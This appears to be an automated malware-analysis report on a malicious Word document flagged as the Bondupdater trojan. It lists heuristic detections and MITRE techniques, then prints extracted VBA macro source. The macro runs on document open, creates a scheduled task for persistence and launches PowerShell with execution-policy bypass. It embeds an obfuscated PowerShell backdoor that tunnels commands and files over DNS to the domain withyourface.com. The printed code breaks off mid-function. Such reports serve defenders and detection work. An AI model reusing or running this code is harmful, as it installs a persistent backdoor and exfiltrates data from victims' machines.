MALICIOUS
410
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains a Document_Open VBA macro that utilizes WScript.Shell to execute commands. The macro constructs a PowerShell command to execute a script located at 'C:\ProgramData\WindowsAppPool\AppPool.ps1'. It also creates a scheduled task using schtasks to run a VBScript, 'C:\ProgramData\WindowsAppPool\AppPool.vbs', every minute, indicating an attempt to establish persistence and download/execute a second-stage payload.
Heuristics 11
-
ClamAV: Win.Trojan.Bondupdater-6751535-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Bondupdater-6751535-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call HGHG Call Shell(Chr(CLng("&H77")) & Chr(CLng("&H73")) & Chr(CLng("&H63")) & Chr(CLng("&H72")) & Chr(CLng("&H69")) & Chr(CLng("&H70")) & Chr(CLng("&H74")) & Chr(CLng("&H20")) & "C:\ProgramData\WindowsAppPool\AppPool.vbs", vbNormalFocus) End Sub -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim A As String A = "DIM fso " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & " Shell0.run """ A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim A As String A = "DIM fso " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & " Shell0.run """ A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65")) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
sss = sss + " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function slab'+'er (SGFVVE) {" & vbCrLf & " SGFf = gc SGFVVE -Encoding Byte;" & vbCrLf & " SGFe = resolver(SGFf);" & vbCrLf & " retur'+'n SGFe;" & vbCrLf & "}" & vbCrLf & "function resolver (SGFWWE) {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFp1 = X9PX9P;" & vbCrLf & " SGFp2'+' = X9PX9P;" & vbCrLf & " for (SGFi = 0; SGFi -lt SGFWWE.Length; SGFi++)" & vbCrLf & " {" & vbCrLf & " if (SGFcnt -eq 30)" & vb … sss = sss + " SGFFFE = @(gci -path (SGF{global:SGFNND}+X9PMxarcvd'+'*X9P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " S'+'GFIIE = SG'+'FFFE[0].ToStri'+'ng()'+'.Replace(X9PrcvdX9P, X9PprocX9P)" & vbCrLf & " rni SGFFFE[0] SGFIIE -Force" & vbCrLf & " '+' SGFYYE = SGFIIE'+' -replace X9PreceiveboxX9P, X9PsendboxX9P;" & vbCrLf & " i'+'f (SGFIIE.EndsWith(X9P0X9P))" & vbCrLf & " {" & vbCrLf & " SGFZZE = gc SGFIIE 7rn'+' ? { SGF_.t'+'rim() … sss = sss + " SGFBBF = gc SGFIIE 7rn ? { SGF_.'+'trim() -ne X9PX9P } 7rn %{ SGF_.Replace(X9PVOl0X9P, X9PX9P).Trim() }" & vbCrLf & " if (Test-path -path SGFBBF)" & vbCrLf & " {" & vbCrLf & " cpi -path SGFBBF -destination SGFYYE -Force;" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " X9PFile not existX9P 7rn sc SGFYYE;" & vbCrLf & " }" & vbCrLf & " if (Test-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " … -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_Open() Call VVVV -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24094 bytes |
SHA-256: 9ef4547c36bfb3d95234f4e8ba8bc1f3c486028eedd33470c1a2aca0ff932350 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
97 of 263 identifiers look randomly generated (e.g. 'X9PMxasendboxX9P'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Call VVVV
Call AAAA
End Sub
Sub AAAA()
Dim A As String
A = "DIM fso " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & " Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "Else" & vbCrLf & "Shell0.run """ & Chr(CLng("&H63")) & Chr(CLng("&H6D")) & Chr(CLng("&H64")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " /C schtasks /create /F /sc minute /mo 1 /tn """"\WindowsAppPool\AppPool"""" /tr """"wscript /b """"C:\ProgramData\WindowsAppPool\AppPool.vbs"""""""""", 0,false" & vbCrLf & "Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "End If" & vbCrLf & "Wscript.Quit(intOK)"
Open "C:\ProgramData\WindowsAppPool\AppPool.vbs" For Output As #1
Print #1, A
Close #1
Call HGHG
Call Shell(Chr(CLng("&H77")) & Chr(CLng("&H73")) & Chr(CLng("&H63")) & Chr(CLng("&H72")) & Chr(CLng("&H69")) & Chr(CLng("&H70")) & Chr(CLng("&H74")) & Chr(CLng("&H20")) & "C:\ProgramData\WindowsAppPool\AppPool.vbs", vbNormalFocus)
End Sub
Sub VVVV()
Dim fdObj As Object
Application.ScreenUpdating = False
Set fdObj = CreateObject("Scripting.FileSystemObject")
If fdObj.FolderExists("C:\ProgramData\WindowsAppPool") Then
Else
fdObj.CreateFolder ("C:\ProgramData\WindowsAppPool")
End If
Application.ScreenUpdating = True
End Sub
Sub HGHG()
Dim sss As String
sss = sss + "(('SGFMMC = '+'X9Pwithyourface.comX9P;" & vbCrLf & "SGFNNC = X9PC:MxaProgramDataMxaWindowsAppPoolX9P;'+'" & vbCrLf & "if (-not (Te'+'st-Path SGFNNC))'+' { md SGFN'+'NC; }" & vbCrLf & "SGFOOC = SGFNNC'+' + X9PMxaquidX9P;" & vbCrLf & "SGFPPC = SGFNNC + X9PMxalockX9P;" & vbCrLf & "'+'if (!(Test-Path SGFPPC)){sc -P'+'ath SGFPPC -Value SGFpid;}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & " SGFQQC = (NEW-TI'+'MESPA'+'N -Start ((Get-C'+'hildItem SGFPPC).CreationTime) -End (Get-Date)).Minute'+'s" & vbCrLf & " if (SGFQQC -gt 10)" & vbCrLf & " {" & vbCrLf & " stop-proces'+'s -'+'i'+'d (gc SGFPPC);" & vbCrLf & " ri '+'-Path SGFPPC;" & vbCrLf & " }" & vbCrLf & " return;" & vbCrLf & "}'+'" & vbCrLf & "SGFRRC ='+' get-content SGFOOC;" & vbCrLf & "SGFS'+'SC = Get-Random -InputObject (10 .. 99);" & vbCrLf
sss = sss + "if (SGFRRC.length -ne 10) { SGFRRC = SGFSSC.ToString() + [guid]::NewGuid().toString().replace(ZxV-ZxV, ZxVZxV).substring(0, 8); SGFRRC 7r'+'n sc SG'+'FOOC }" & vbCrLf & "gi SGFOOC -Force 7rn %{ SGF_.Attributes = X9PHiddenX9P }" & vbCrLf & "SGF{global:SGFTTC} = 0;" & vbCrLf & "'+'" & vbCrLf & "function UUC (SGFVVC, SGFWWC, SGFXXC, SGFYY'+'C, SGFZZC, SGFAAD)" & vbCrLf & "{" & vbCrLf & " SGFBBD = -joi'+'n ((48 .. 57)+(65 .. 70) 7rn Get-Random -Count (%{ Get-Random -Inp'+'ut'+'Object (1 .. 7) }) 7rn %{ [char]SGF_ });" & vbCrLf & " SGFCCD = Get-Random -InputObject (0 .. 9) -Count 2;" & vbCrLf & " SGFDDD = SGFRRC.Insert((SGFCCD['+'1]), SGFWWC).Insert(SGFCCD[0], SGFVVC);" & vbCrLf & " if (SGFZZC -eq X9PsX9P)" & vbCrLf & " { return X9PSGF(SGFDDD)SG'+'F(SGFAAD)'+'SGF(SGFBBD)CSGF(SGFCCD[0])SGF(SGFCCD[1])T.SGFXXC.SGFYYC.SGFMMCX9P; }" & vbCrLf & " else " & vbCrLf & " { return X9PSGF(SGFDDD)SGF'+'(SGFAAD)SGF(SGFBBD)CSGF(SGFC'+'CD[0])SGF(SGFCCD[1])T.SGF(SGFMMC)X9P;}" & vbCrLf
sss = sss + "}" & vbCrLf & "fu'+'nction EED()" & vbCrLf & "{" & vbCrLf & " SGFFFD = SGFnull;" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " SGFFFD = ((Get-'+'WmiObject Win32_Networ'+'kAdapterConfig'+'uration -ComputerName SGFen'+'v:computername -E'+'A Stop 7rn ? { SGF_.IPEnabled }).DNSServerSearchOrder)[0] 7rn Out-String" & vbCrLf & " }" & vbCrLf & " catch [exception] {" & vbCrLf & " #Write-Host SGF_.Message" & vbCrLf & " }" & vbCrLf & " if (!SGFFFD)" & vbCrLf & " {" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " SGFns = nslook'+'up.exe 8.8.8.8;" & vbCrLf & " SGFFFD = (SGFns[1] -split ZxV:ZxV)[1].Trim();" & vbCrLf & " }" & vbCrLf & " catch [exception] {" & vbCrLf & " #Write-Host SGF_.Message" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " re'+'turn SGFFFD" & vbCrLf & "}" & vbCrLf & "function GGD (SGFHHD'+')" & vbCrLf & "{" & vbCrLf & " SGFip = EED" & vbCrLf & " SGFars = ['+'system.net.IPAddress]::Parse([System.Net.Dns]::GetHostAddresses(SGFMMC));" & vbCrLf
sss = sss + " SGFend = New-Object System.Net.IPEndPoint SGFars, 53" & vbCrLf & " SGFs = Ne'+'w-Object System.Net.Sock'+'ets.UdpClient" & vbCrLf & " SGFs.Client.Rece'+'iveTimeout = SGFs.Client.SendTimeout = 1500'+'0" & vbCrLf & " SGFs.Connect(SGFend)" & vbCrLf & " SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0'+'x00, 0x00)" & vbCrLf & " if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + '+'SGFHHD; }" & vbCrLf & " if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD'+' = SGFHHD + X9P.X9P; }" & vbCrLf & " SGFmb = [System'+'.Text.Encoding]::ASCII.GetBytes(SGFHHD)" & vbCrLf & " SGFp = SGFHHD.Split(ZxV.ZxV)" & vbCrLf & " SGFpi = 1" & vbCrLf & " '+'for (SGFi = 0; SGFi -lt SGFmb.length; SGFi++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGF'+'i] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & " SGFpre'+' += SGFmb" & vbCrLf & " SGFpre += (0x00, 0x10, 0x00, 0x01)" & vbCrLf & " SGFbuf = SGFpr'+'e" & vbCrLf & " SGFSent = SG'+'Fs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf
sss = sss + " SGFrb = SGFs.Receive([re'+'f]SGFend)" & vbCrLf & " SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.length + 29)))" & vbCrLf & " [System.Buffer]::Bl'+'ockCopy(SGFrb, SGFmb.length + 29, SGFr,'+' 0, (SGFrb.length - (SGFmb.length + 29))'+')" & vbCrLf & " return SGFr'+'" & vbCrLf & "}" & vbCrLf & "function '+'IID (SGFHHD)" & vbCrLf & "{" & vbCrLf & " SGFip = EED" & vbCrLf & " SGFars = [system.net.IPAddress]::Parse([System.Net.Dns]::Get'+'HostAddresses(SGFMMC)'+');" & vbCrLf & " SGFend = New-Object Syste'+'m.Net.I'+'PEnd'+'Point SGFars, 53" & vbCrLf & " SGFs = New-Object System.Net.Sockets.UdpClient" & vbCrLf & " SGFs.Client.ReceiveTimeo'+'ut = SGFs.Client.SendTimeout = 15000" & vbCrLf & " SGFs.Connect(SGFend)" & vbCrLf & " SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)" & vbCrLf & " if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + SGFHHD; }" & vbCrLf & " if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD = SGF'+'HHD + X9P.X9P; }" & vbCrLf
sss = sss + " SGFmb = [System.Text.Encoding]::ASCII.GetBytes(SGFHH'+'D)" & vbCrLf & " SGFp = SG'+'FHHD.Split(ZxV.ZxV)" & vbCrLf & " SGFpi = 1" & vbCrLf & " for'+' (SGFi = 0; SGFi -lt SGFmb.length; SGFi'+'++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGFi] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & " SGFpre += SGFmb" & vbCrLf & " SGFpre += (0x00, 0x01, 0x00, 0x01)" & vbCrLf & " SGFbuf = SGFpre" & vbCrLf & " SGFSent = SGFs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf & " SGFrb = SGFs.Receive([ref]SGFend)" & vbCrLf & " SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.lengt'+'h + 28)))" & vbCrLf & " [System.Buffer]::BlockCopy(SGFrb, SGFmb.len'+'gth + 28, SGFr'+', 0, (SGF'+'rb.length - (SGFmb.length + 28)))" & vbCrLf & " retu'+'rn SGFr" & vbCrLf & "}" & vbCrLf & "function JJD" & vbCrLf & "{" & vbCrLf & " SGFKKD = SGFfalse;" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGFMMD = SGF{glob'+'al:SGFNND}'+' + X9PMxaX9P;" & vbCrLf & " SGFOOD = @();" & vbCrLf & " SGFPPD = X9P000X9P;" & vbCrLf
sss = sss + " '+'SGFQQD = X9P0X9P;" & vbCrLf & " SGF{global:SGFRRD} = SGFtru'+'e;'+'" & vbCrLf & " SGF{global:SGFSSD} = 0;" & vbCrLf & " SGF{global:SGF'+'SGFTTD} = 5;'+'" & vbCrLf & " " & vbCrLf & " While (SGF{global:SGFRRD})" & vbCrLf & " {" & vbCrLf & " St'+'art-Sleep -m 50;" & vbCrLf & " if (SG'+'F'+'{global:SGFSSD} -gt SGF{global:SGFSGFTTD}) { break }" & vbCrLf & " if (SGFLLD -eq [int]SGFPPD) { SGF{global:SGFSSD}++ }" & vbCrLf & " if (SGFLLD -lt 10) '+'{ SGFPPD = X9P00SGF(SGFLLD)X9P; '+'}" & vbCrLf & " elseif (SGFLLD -lt 100) { SGFPPD = X9P0SGF(SGFLLD)X9P;'+' }" & vbCrLf & " else { SGFPPD = X9PSGF(SGFLLD)X9P; }" & vbCrLf & " SGFUUD = UUC SGFPPD SGFQQD '+'X9PX9P X9PX9P X9PrX9P" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " Write-Host SGF'+'UUD;" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & " Write-Host SGFVVD;" & vbCrLf & " '+' }" & vbCrLf & " catch [Except'+'ion]" & vbCrLf & " {" & vbCrLf
sss = sss + " echo SGF_.Exception.GetType().FullName, SGF_.Exception.Message; Write-Host X9Pexcepton occured!X9P; SGF{global:SGFSSD}++; continue;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFVVD -eq SGFnull)" & vbCrLf & " {" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & " continue;" & vbCrLf & " }" & vbCrLf & " SGFWWD = SGFVVD[0].IPAddressToString.Split(ZxV.ZxV);" & vbCrLf & " Write-Host X9PSGF(SGFLLD'+'):SGF(SGFW'+'WD[3])VOltsaveing_mode: S'+'GF(SGFKKD)VOl'+'t '+' S'+'GF(SGFWWD[0]) SGF(SGFWWD[1]) SGF'+'(SGFWWD[2])X9P" & vbCrLf & " if ((SGFWWD[0] -eq 1) -and (SGFWWD[1]'+' -eq 2) -and'+' (SGFWWD[2] -eq 3))" & vbCrLf & " {" & vbCrLf & " SGFKKD = SGFfalse;" & vbCrLf & " SGFQQD ='+' X9P0'+'X9P;" & vbCrLf & " SGFlen = SGFOOD.Length" & vbCrLf & " '+' if (SGFOOD[SGFlen - 1] -e'+'q 0 -and SGFOOD[SGF'+'len - 2] -eq 0)" & vbCrLf & " {" & vbCrLf & " SG'+'FXXD = SGFOOD[0 .. (SGFlen - 3)];" & vbCrLf & " }" & vbCrLf
sss = sss + " elsei'+'f (SGFOOD[SGFlen - 1] -eq 0)" & vbCrLf & " {" & vbCrLf & " SGFXXD = SGFOOD[0 .. (SGFlen - 2)];" & vbCrLf & " }" & vbCrLf & " e'+'lse" & vbCrLf & " {" & vbCrLf & "'+'" & vbCrLf & " SGFXXD = SGFOOD;" & vbCrLf & " }" & vbCrLf & " [System.IO.File]:'+':WriteAllBytes(SG'+'FMMD, SGFXXD);" & vbCrLf & " SGFOOD = @();" & vbCrLf & " SGFXXD = @();" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFKKD)" & vbCrLf & " {" & vbCrLf & " if (SGFLLD -gt 250) { SGFLLD = 0; }" & vbCrLf & " if (SGFLLD -eq SGFWWD[3]'+')" & vbCrLf & " {" & vbCrLf & " SGFOOD += SGFWWD[0];" & vbCrLf & " SG'+'FOOD += SGFWWD[1]'+';" & vbCrLf & " SGFOOD += SGFWWD'+'[2];" & vbCrLf & "'+' SGFLLD = SGFLLD + 3'+';" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if ((SGF'+'WWD[0] -eq 24) -and (SGF'+'WWD[1] -eq 125'+'))" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFMMD += X9PrcvdX9P + SGFWWD[2] + X9PX9P + SGFWWD[3];" & vbCrLf & " SGFKKD = SGFtrue;" & vbCrLf & " SGFQQD = X9P1X9P;" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " }" & vbCrLf & " '+' " & vbCrLf & " if ((SGFWWD[0] -eq 11) -and (SGFWWD[1] -eq 24) -and (SGFWWD[2] -eq 237)'+' -and (S'+'GFW'+'WD[3] -eq 110)) # kill '+'this process" & vbCrLf & " {" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " Start-Sleep -s 1;" & vbCrLf & "}" & vbCrLf & "function'+' YYD" & vbCrLf & "{" & vbCrLf & " SGFbyts = @(); SGFct = 0; SGFfb '+'= @(); SGFrn = X9P000X9P; SGFZZD = X9PWX'+'9P; SGFrun = SGFtrue; SGFAAE = SGF{global:SGFNND} + X9PMxaX9P;" & vbCrLf & " SGFBBE = 0;" & vbCrLf & " While (SGFrun)" & vbCrLf & " {" & vbCrLf & " Start-S'+'leep -m 50;" & vbCrLf & " if (SG'+'FBBE -gt 5){ SGFrun = SGFfalse;'+' }" & vbCrLf & " if'+' (SGFct -lt 10){SGFrn = X9P000SGF(SGFct)X9P;}" & vbCrLf
sss = sss + " elseif (SGFct -lt 100){SGFrn = X9P00SGF(SGFct)X9P;}" & vbCrLf & " elseif (SGFct -lt 1000){SGFrn = X'+'9P0SGF(SGFct)X9P;}" & vbCrLf & " els'+'e{SGFrn = X9PSGF(SGFct)X9P;}" & vbCrLf & "'+' try" & vbCrLf & "'+'" & vbCrLf & " {" & vbCrLf & " SGFCCE = UUC X9P000X9P '+'SGFZZ'+'D X9PX9P'+' X9PX9P '+'X9PrX9P SGFrn" & vbCrLf & " '+' SGFtmp = GGD(SGFCCE);" & vbCrLf & " SG'+'Fres = '+'[System.Text.Encodin'+'g]::'+'ASCII.GetString(SGFtmp);" & vbCrLf & " }" & vbCrLf & " catch [exception] { Write-Host SGF_; SGF'+'BBE++; SGF{glo'+'bal:SGFTTC}++; cont'+'inue; }" & vbCrLf & " if ([string]::IsNullOrEmpty(SGFres)) { SGFBBE++; SGF{global:SGFTTC}++; continue;}" & vbCrLf & " SGFrs = SGFres.Split(ZxV>ZxV);" & vbCrLf & " SGFdata = X9PX9P;" & vbCrLf & " For (SGFi = 0; SGFi -le SGFrs[1].Length; SGFi++) { if (SG'+'Frs[1][SGFi] -lt 125 -and SGFrs[1][SGFi] -gt 41) { SGFdata += SGFrs[1][SGFi]; } }" & vbCrLf & " if (SGFrs'+'[0][0] -eq X9PNX9P)" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFZZD = X9PWX9P;" & vbCrLf & " SGFBBE++;" & vbCrLf & " continu'+'e;" & vbCrLf & " '+' }" & vbCrLf & " if (SGFrs[0] -eq X9PS000sX9P)" & vbCrLf & " {" & vbCrLf & " SGFBBE = 0;" & vbCrLf & " '+' SGFZZD = X9PDX9P;" & vbCrLf & " SGFAAE'+' += (X9PrcvdX9P+SGFdata);" & vbCrLf & " SGFct = 0;" & vbCrLf & " continue;" & vbCrLf & " }" & vbCrLf & " if (SGFrs['+'0][0] '+'-eq ZxVSZxV -'+'and -not'+' (SGFfb'+' -contains SGFrs[0]))" & vbCrLf & " '+' {'+'" & vbCrLf & " SGFZZD = X9PDX9P;" & vbCrLf & " if (SGFrs[0].EndsWith(SGFrn))" & vbCrLf & " {" & vbCrLf & " t'+'ry" & vbCrLf & " {" & vbCrLf & " '+' SGFtmp = SGFdata.Replace(ZxV-ZxV, ZxV+ZxV).Replace(ZxV_'+'ZxV, ZxV/ZxV);" & vbCrLf & " '+' SGFbyts += [System.Convert]::FromBase64String(SGFtmp);" & vbCrLf & " SGFct++;" & vbCrLf & " SGF'+'fb'+' += SGFrs[0];" & vbCrLf & " }" & vbCrLf & " catch" & vbCrLf & " {" & vbCrLf & " Write-Host X9PException in receiver_X9P+SGF'+'_;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf
sss = sss + " if (SGFrs[0].StartsWith(X9PEX9P))" & vbCrLf & " {" & vbCrLf & " [System.IO'+'.File]::WriteA'+'llBytes(SGFAAE, SGFbyts);" & vbCrLf & " break;" & vbCrLf & " }" & vbCrLf & " if (SGFrs[0].StartsWith(X9PCX9P))" & vbCrLf & " {" & vbCrLf & " SGFct = 0; SGFrun = SGFf'+'alse;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function DDE(SGFEEE)" & vbCrLf & "{" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGFFFE = @(gci -path (SGF{global:SGFGGE}+X9PMxaproc*X9'+'P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " " & vbCrLf & " SGFHHE ='+' SGFFFE[0].ToString().'+'Substring(SGFFFE[0'+'].ToStrin'+'g().L'+'e'+'ngth - 5)" & vbCrLf & " SGFIIE = SGF'+'{gl'+'obal:SGFGGE} + X9PMxaX9P + SGFHHE;'+'" & vbCrLf & " rni SGFFFE[0] S'+'GFIIE -'+'Force" & vbCrLf & " SGFJJE = slaber'+' SGFIIE;" & vbCrLf & " if ([int]SGFJ'+'JE.Length -le 0) { rd -path SGFIIE;return; }" & vbCrLf & " SGFKKE = 60;" & vbCrLf
sss = sss + " SGFLLE = X9P*X9P * 54;" & vbCrLf & " SGFLLE = Split-path SGFIIE -Leaf 7rn % { SGFLLE.Insert(0, SGF_) } 7rn %'+' { SGF_.Insert(6, SGFJJE.Length) } 7rn'+' '+'%{ SGF_[0 .. 26] -join X9PX9P };" & vbCrLf & " SGFLLE = -join (SGFLLE 7rn % { resolver S'+'GF_ })" & vbCrLf & " SGFMME = X9PCOCTabX9P + SGFLLE;" & vbCrLf & " SGFJJE = SGFMME + SGFJJE;" & vbCrLf & " '+'SGFNNE = X9P000X9P;" & vbCrLf & " SGFQQD = X9P2X9P;" & vbCrLf & " SGFOOE = 0;" & vbCrLf & "'+'" & vbCrLf & " SGFPPE = SGFtrue;" & vbCrLf & " SGF{global:SGFRRD} '+'= SGFtrue;" & vbCrLf & " SGFQQE = SGFtrue;" & vbCrLf & " SGF{global:SGFSSD} = 0;" & vbCrLf & " '+' SGF'+'{global:SGFTTD} = 5;" & vbCrLf & " " & vbCrLf & " While (SGF{global'+':SGFRRD})" & vbCrLf & " {" & vbCrLf & " Start-Sleep -m 10;" & vbCrLf & " if (SGF{global:SGFSSD} -gt SGF{global:SGFTT'+'D})" & vbCrLf & " {" & vbCrLf & " SGFRRE = SGF{gl'+'obal:SGFGGE} + X9PMxaprocX'+'9P + SGFHHE;'+'" & vbCrLf & " '+' rni SGFIIE SGFRRE -Force;" & vbCrLf
sss = sss + " break;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & "'+' if (SGFLLD -lt 10) { SGFNNE = X9P00SGF(SGFLLD)X9P; }" & vbCrLf & " elseif (SGFLLD -lt 100) { SGFNNE = X9P0SGF(SGFLLD)X9P; }" & vbCrLf & " else { SGFNNE = X9PSGF(SGFLL'+'D)X9P; }" & vbCrLf & " " & vbCrLf & " if (SGFL'+'LD -eq 250)" & vbCrLf & " {" & vbCrLf & " if (SGFPPE)" & vbCrLf & " {" & vbCrLf & " SGFOOE += 250;" & vbCrLf & " }" & vbCrLf & " SGFLLD = 0; SGFPPE = SGFfalse;" & vbCrLf & " }" & vbCrLf & " if (SGFLLD -eq 200) { SGFPPE = SGFtrue; }" & vbCrLf & " " & vbCrLf & " if (SGFJJE.Length -gt SGFKKE)" & vbCrLf & " {" & vbCrLf & " if ((SGFJJE.L'+'ength - SGFKKE * (SGFLLD + SGFOOE)) -ge SG'+'FKKE)" & vbCrLf & " {" & vbCrLf & " SGFSSE = SG'+'FJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), SGFKKE);" & vbCrLf & " }" & vbCrLf & " elseif ((SGFJJE.Len'+'gth - SGFKKE * (SGFLLD + SGFOOE)) -gt 0)" & vbCrLf & " {" & vbCrLf
